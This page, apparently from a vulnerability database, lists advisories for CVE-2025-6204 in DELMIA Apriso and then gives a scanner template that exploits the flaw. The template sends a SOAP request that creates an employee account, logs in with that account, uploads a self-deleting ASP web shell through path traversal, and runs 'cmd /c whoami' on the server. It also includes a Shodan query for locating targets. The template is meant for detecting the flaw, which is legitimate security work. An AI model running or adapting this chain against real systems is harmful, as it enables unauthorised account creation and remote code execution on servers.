| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| CVE-2025-6204 | 4 Aug 202513:04 | – | circl | |
| Dassault Systèmes DELMIA Apriso Code Injection Vulnerability | 28 Oct 202500:00 | – | cisa_kev | |
| CISA Adds Two Known Exploited Vulnerabilities to Catalog | 28 Oct 202512:00 | – | cisa | |
| Dassault Systèmes DELMIA Apriso 安全漏洞 | 4 Aug 202500:00 | – | cnnvd | |
| CVE-2025-6204 | 4 Aug 202509:14 | – | cve | |
| CVE-2025-6204 Improper Control of Generation of Code (Code Injection) vulnerability affecting DELMIA Apriso from Release 2020 through Release 2025 | 4 Aug 202509:14 | – | cvelist | |
| DELMIA Apriso Code Injection Vulnerability (CVE-2025-6204) | 3 Nov 202500:00 | – | nessus | |
| EUVD-2025-23494 | 3 Oct 202520:07 | – | euvd | |
| CVE-2025-6204 | 4 Aug 202510:15 | – | nvd | |
| CVE-2025-6204 | 4 Aug 202510:15 | – | osv |
id: CVE-2025-6204
info:
name: DELMIA Apriso - Command Injection
author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
severity: critical
description: |
An Improper Control of Generation of Code (code injection / file upload → RCE) vulnerability affecting DELMIA Apriso (Release 2020 → Release 2025). When an authenticated user can upload files and the upload handler fails to canonicalize filenames or enforce storage restrictions, an attacker may place executable artifacts into web-served locations (via path traversal or insufficient normalization) and achieve remote code execution under the webserver context.
remediation: |
Apply security patches from DELMIA for Release 2020 through Release 2025 to implement proper file upload validation and path canonicalization.
impact: |
Authenticated attackers can upload executable files through path traversal to achieve remote code execution on DELMIA Apriso servers.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-6204
- https://www.3ds.com/trust-center/security/security-advisories/cve-2025-6204
- https://projectdiscovery.io/blog/remote-code-execution-in-delmia-apriso
metadata:
verified: true
max-request: 5
shodan-query: title:"DELMIA Apriso"
classification:
cve-id: CVE-2025-6204
epss-score: 0.76148
epss-percentile: 0.99475
cwe-id: CWE-94
cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
cvss-score: 9.0
tags: cve,cve2025,delmia,apriso,rce,traversal,upload,intrusive,vuln,kev,vkev
flow: http(1) && http(2) && http(3) && http(4) && http(5)
variables:
filename: "{{randbase(5)}}"
username: "LAST"
password: "9"
http:
- raw:
- |-
POST /Apriso/MessageProcessor/FlexNetMessageProcessor.svc HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml;charset=utf-8
Soapaction: "http://tempuri.org/IFlexNetMessageProcessor/ProcessMessageASync_v2"
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:ProcessMessageASync_v2>
<tem:xmlMessage><FlexNet_Employees xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="S:/SchemaRepository/XMLSchemas/FlexNet/FlexNet_Employees.xsd" Version="1.0"> 	<Employee> 		<GivenName>FIRST</GivenName> 		<FamilyName>LAST</FamilyName> 		<EmployeeNo>08262004</EmployeeNo> 		<LoginName>{{username}}</LoginName> 		<Password>{{password}}</Password> 		<HireDate>2000-06-01T00:00:00</HireDate> 		<SpokenLanguageID>1033</SpokenLanguageID> 		<WrittenLanguageID>1033</WrittenLanguageID> 		<EmployeeValidDate>2000-06-01T00:00:00</EmployeeValidDate> 		<LoginExpirationDate>9999-12-31T00:00:00</LoginExpirationDate> 		<EmployeeType>0</EmployeeType> 		<DefaultFacility>C1P1</DefaultFacility> 		<TrackLaborFlag>true</TrackLaborFlag> 		<ResourceID NodeType="Field"> 			<Resource_Insert> 				<Name>FIRST</Name> 				<ResourceName>FIRST</ResourceName> 				<ResourceType>1</ResourceType> 				<FUID NodeType="Field"/> 			</Resource_Insert> 		</ResourceID> 		<EmployeeRole> 			<EmployeeID NodeType="Field"/> 			<RoleID NodeType="Field"> 				<Role> 					<Role>Production User</Role> 				</Role> 			</RoleID> 		</EmployeeRole> 	</Employee> </FlexNet_Employees></tem:xmlMessage>
<tem:applicationName>myExternalApplication</tem:applicationName>
</tem:ProcessMessageASync_v2>
</soapenv:Body>
</soapenv:Envelope>
matchers:
- type: word
part: body
words:
- ProcessMessageASync_v2Response
- <ProcessMessageASync_v2Result>true</ProcessMessageASync_v2Result>
condition: and
internal: true
- raw:
- |
GET /Apriso/Portal/Kiosk/Login.aspx HTTP/1.1
Host: {{Hostname}}
redirects: true
extractors:
- type: regex
part: body
name: viewstate
group: 1
regex:
- '__VIEWSTATE" value="(.*?)"'
internal: true
- type: regex
part: body
name: eventval
group: 1
regex:
- '__EVENTVALIDATION" value="(.*?)"'
internal: true
- type: regex
part: body
name: viewgen
group: 1
regex:
- '__VIEWSTATEGENERATOR" value="(.*?)"'
internal: true
- raw:
- |-
POST /Apriso/Portal/Kiosk/Login.aspx?BackToStartPage=true HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE={{urlencode(viewstate)}}&__VIEWSTATEGENERATOR={{viewgen}}&__EVENTVALIDATION={{urlencode(eventval)}}&ctl04%24LoginTextBox={{username}}&ctl04%24PasswordTextbox={{password}}&ctl04%24LogInButton=Log+In&ctl04%24HiddenValue=Initial+Value&ctl04%24HiddenValue2=Initial+Value
matchers:
- type: dsl
dsl:
- status_code == 302
internal: true
# Self-deleteable ASP POC File
- raw:
- |
POST /Apriso/webservices/1.1/operation.svc/UploadFile?filename=375c9638-1a4e-465d-90d7-f69321315acb-xxx\..\..\..\portal\Uploads\{{filename}}.asp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
<%
Response.Write "{{randstr}}" & "<br>"
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()
Response.write(o)
Set fso = Server.CreateObject("Scripting.FileSystemObject")
fso.DeleteFile Server.MapPath(Request.ServerVariables("SCRIPT_NAME")), True
Set fso = Nothing
%>
matchers:
- type: word
part: body
words:
- Uploads
- ResultMessage
- FilePath
- Success
- "{{filename}}.asp"
condition: and
internal: true
- raw:
- |
GET /Apriso/Portal/Uploads/{{filename}}.asp HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "{{randstr}}"
extractors:
- type: regex
group: 1
regex:
- <br>(.*)
# digest: 490a00463044022057d12a74110ee23dfd2fd6f3e1b006d4d73d448861591344acf0c38e2bb83e460220721b7c6927d8bb52a80cd5ffad5b5894fd1608583e6dbebeb7b6836295ae1363:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation